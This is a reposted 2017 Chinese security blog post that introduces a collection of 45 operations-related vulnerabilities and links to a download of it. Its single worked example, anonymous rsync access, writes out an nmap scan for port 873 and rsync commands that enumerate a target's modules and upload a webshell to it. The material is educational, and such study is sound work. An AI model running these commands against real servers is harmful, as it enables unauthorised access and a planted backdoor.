【漏洞赏析】安全运维那些洞

0x00 缘由

有人说:编程是一种美,是一门艺术,享受其中思维的妙曼身姿,一个有灵魂的程序猿叫做万物的“造物主”;

而我说:漏洞是一种美,是一个世界,畅游于黑暗的世界里探索,一个有个性的白帽子叫做世间的“救世主”。

0x01 概括

不知从何时起,养成了一个喜欢看“漏洞”的习惯,乌云的离开让很多人伤心而遗憾。不知从何时起,养成了一个喜欢记笔记、总结、思考的习惯,于是有了今天这份paper:

或许,很多朋友已经看到过标题,因为之前没有自己的公众号在T00Ls发过,后来又被人转到过爱春秋。现在打算开始尝试公众号,想起是时候把它纳入怀中了。

0x02 结构

这份 paper 没有太多个人思路,但却不失某一漏洞的利用方法及遇到的问题(当时有的没有解决,然而后来也没有继续补充)。仅单纯的按照自己的思路,记录和总结常见的运维相关安全漏洞。难免会有错误与不足(包括不全面)之处,还请大家不吝赐教。

1)很早之前为止,共收集运维相关漏洞45例

2)每例结构分为:基础知识、漏洞利用、实战演练(及修复方案)

以rsync匿名访问为例:

--1 基础知识

rsync 是一个远程数据同步工具,用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

下载文件:

./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile

上传文件:

/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out

--2 利用方法

rsync 默认端口是 873,可使用 nmap 进行扫描:

nmap –n –open –p 873 x.x.x.x/24

尝试上传、下载文件( kali 中):rsync 10.210.208.39::

或 rsync –vvvv rsync://10.210.208.39::

--3 实战演练

获取文件信息找到网站目录:# rsync -v xx.xx.xx.xx::

同步本地大马至远程服务器,上传webshell

# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest

确认是否成功: # rsync -v xx.xx.xx.xx::Etest

获取目标webshell:

3)每例中可能是一类漏洞的集合

比如struts漏洞:

又如web服务器解析漏洞:

0x03 结语

以上漏洞大餐可能时间较久,如果有想继续完善的朋友可以留言。

下载链接如下(下载即同意以上PS中的内容):

链接: https://pan.baidu.com/s/1o8mlfAE 密码: mk4d

原文发布于微信公众号 - 我的安全视界观(CANI_Security)

原文发表时间:2017-11-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Java架构沉思录

万亿级数据洪峰下的分布式消息引擎

通过简单回顾阿里中间件(Aliware)消息引擎的发展史,本文开篇于双11消息引擎面临的低延迟挑战,通过经典的应用场景阐述可能会面临的问题 - 响应慢,雪崩,用...

1012
来自专栏FreeBuf

上传恶意文件时无意泄露两个0-day,被研究人员抓个正着

一个未知的黑客组织在向公开恶意软件扫描引擎上传一个用于攻击的 PDF 文件时,无意间泄露了两个 0-day 漏洞。漏洞被研究人员捕获,并及时上报给厂商修复。

751
来自专栏编程一生

业务高速增长场景下的稳定性建设实战

1682
来自专栏安智客

Google年度安全报告--8大潜在的恶意程序

最新Google年度安全报告中提到:2017年,从Google Play下载到有害应用程序的可能性比小行星撞击地球的可能性还要低。 安智客在空余时间将报告进行了...

3758
来自专栏云计算教程系列

如何在Ubuntu上搭建方舟:生存进化服务器

《方舟:生存进化》(英语:Ark: Survival Evolved)是一款由Studio Wildcard制作与发行的生存类沙盒动作冒险游戏,使用虚幻4引擎打...

4443
来自专栏向治洪

OSGi简介

这两天在研究Kotlin时,看到Kotlin和和OSGi的完美融合,就有必要介绍下OSGi。 OSGi是什么 OSGi是Open Services Gatewa...

2595
来自专栏程序员的碎碎念

What‘s docker?How to study?

看图说话:“一只可爱的大鲸鱼上面摆放着许多小箱子,而这些小箱子呢--就是应用程序,鲸鱼就是操作系统”。 大家应该都知道集装箱吧,不过你是什么货物,通过什么运输方...

1102
来自专栏乐享123

Migrate Centos7 From Centos6

1905
来自专栏FreeBuf

五大安全研究者必用的搜索引擎

CNN 曾在 2013 年 4 月 8 日 的新闻报道中称 Shodan 是“互联网上最可怕的搜索引擎”。 甚至光是听它的名字,就让人觉得不寒而栗! 那只是三年...

2087
来自专栏程序猿

假装是周五:博客推荐第四期

“ 刚刚停下手里的工作,一看表,发现已经过了周五了......另外,给我留言的或者是添加我好友的,没来及的添加或者回复,先搁置。推荐给大家的博客,并不是商业推广...

1192

扫码关注云+社区